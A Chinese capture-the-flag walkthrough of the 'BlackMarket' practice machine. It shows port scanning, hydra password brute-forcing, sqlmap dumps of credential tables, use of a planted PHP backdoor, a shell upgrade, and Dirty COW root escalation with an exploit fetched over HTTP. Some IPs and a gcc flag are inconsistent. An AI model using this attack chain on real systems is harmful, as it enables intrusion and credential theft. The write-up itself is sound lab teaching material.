打开靶机,将靶机与攻击机kali设为桥接模式,并查看靶机MAC地址:
一、信息收集
确定目标主机:
arp-scan -l
查看靶机开放的端口:
nmap -A -sS -sV -v -p- 192.168.7.97
浏览器访问80端口,发现是一个登录页面
查看页面源代码,找到flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=},发现它是base64编码对其解密为:CIA – Operation Treadstone
浏览器搜索CIA – Operation Treadstone 相关内容:
使用cewl来爬取该CIA – Operation Treadstone网站来生成字典
cewl -d -m -w CIA-OT.txt https://bourne.fandom.com/wiki/Operation_Treadstone
使用九头蛇hydra爆破ftp账号密码得到nicky CIA;但爆破ssh失败
hydra -L CIA-OT.txt -P CIA-OT.txt -V -f 192.168.7.97 ftp
使用ftp连接nicky用户,发现连接成功
得到了flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy},并看到提示“CIA blackmarket Vehicle workshop”——中央情报局黑市车辆车间
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
more IMP.txt
使用dirb扫描目录
dirb http://192.168.7.97/
拼接/squirrelmail/
发现了squirrelmail的版本号为1.4.23,搜索相关漏洞发现了Squirrelmail远程代码执行漏洞(CVE-2017-7692),这个漏洞利用的前提是拥有一个登录的邮箱账号和密码,暂时无发现,先搁置
拼接/supplier/,这个目录会302重定向到Web登录界面
尝试使用目录名字supplier supplier登录,发现登录成功
编辑AK74U时抓包,再使用sqlmap检测是否存在SQL注入,发现存在SQL注入
获取所有数据库名:
sqlmap -r sql.txt --dbs --batch
获取BlackMarket数据库下的表:
sqlmap -r sql.txt -D BlackMarket --tables --batch
获取flag表所有的字段:
sqlmap -r sql.txt -D BlackMarket -T flag --columns --batch
获取所有字段数据:
sqlmap -r sql.txt -D BlackMarket -T flag -C name,FlagId,Information --dump --batch
发现flag3需要找 Jason Bourne 电子邮件访问;
获取user表中的字段
sqlmap -r sql.txt -D BlackMarket -T user --columns --batch
获取所有数据:
sqlmap -r sql.txt -D BlackMarket -T user -C access,password,username,userid --dump --batch
对各用户密码进行解密:
admin BigBossCIA
user user
jbourne 解密失败
bladen 解密失败
登录admin用户,登录成功并发现了flag4{bm90aGluZyBpcyBoZXJl}以及Jason Bourne邮箱密码:?????
发现了Jason Bourne 的电子邮件:jbourne@cia.gov
一开始我们就找到了一个邮箱的登录界面,开始的想法是利用已知的漏洞去攻击,但是现在可以不用了,我们知道了邮箱密码为:????;用户名应该和Jason Bourne有关,而上述又发现了jbourne用户,尝试进行登录,登陆成功
点击INBOX.Trash——>IMPORTANT MESSAGE,发现flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
还发现了一段不知道什么语言的文字,对如下内容进行解码,解码网站:quipqiup - cryptoquip and cryptogram solver
Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.
Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.
这段话告诉我们/kgbbackdoor目录下留了一个后门,后门是一张叫PassPass.jpg的图片,但是没有路径,并且前面目录爆破也没有;
只能从数据库着手了,发现有一个eworkshop的数据库,利用crunch生成字典进行爆破:
crunch 9 9 -t @workshop > shop.txt
利用dirb爆破路径拿到路径:
dirb http://192.168.7.97 shop.txt
拼接/vworkshop/kgbbackdoor/PassPass.jpg
将照片下载到本地然后上传到kali上,并对其进行查看,发现密码为:5215565757312090656,解密为:HailKGD
cat PassPass.jpg
存在backdoor.php文件,那么后门路径就是http://192.168.1.104/vworkshop/kgbbackdoor/backdoor.php
,访问发现404,查看页面源代码,发现登录框
第一次输入密码无反应,多次输入(用POST传pass=HailKGB),成功进入后门
成功得到flag6{Um9vdCB0aW1l}
二、Getshell
设置监听
监听成功
三、权限提升(脏牛提权)
获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看系统内核——linux系统,内核版本4.4.0-31-generic,搜索发现这个版本可以利用CVE-2016-5195脏牛提权,知道了这是一个内核竞争提权漏洞
搜索脏牛提权
将exp复制到kali上面来,并开启一个http服务
cp /usr/share/exploitdb/exploits/linux/local/40616.c .
python3 -m http.server
然后靶机将exp从kali下载过去(记得下载到/tmp目录,这个目录有写入权限),最后编译执行
gcc 40616.c -0 cowroot -pthread
提权成功!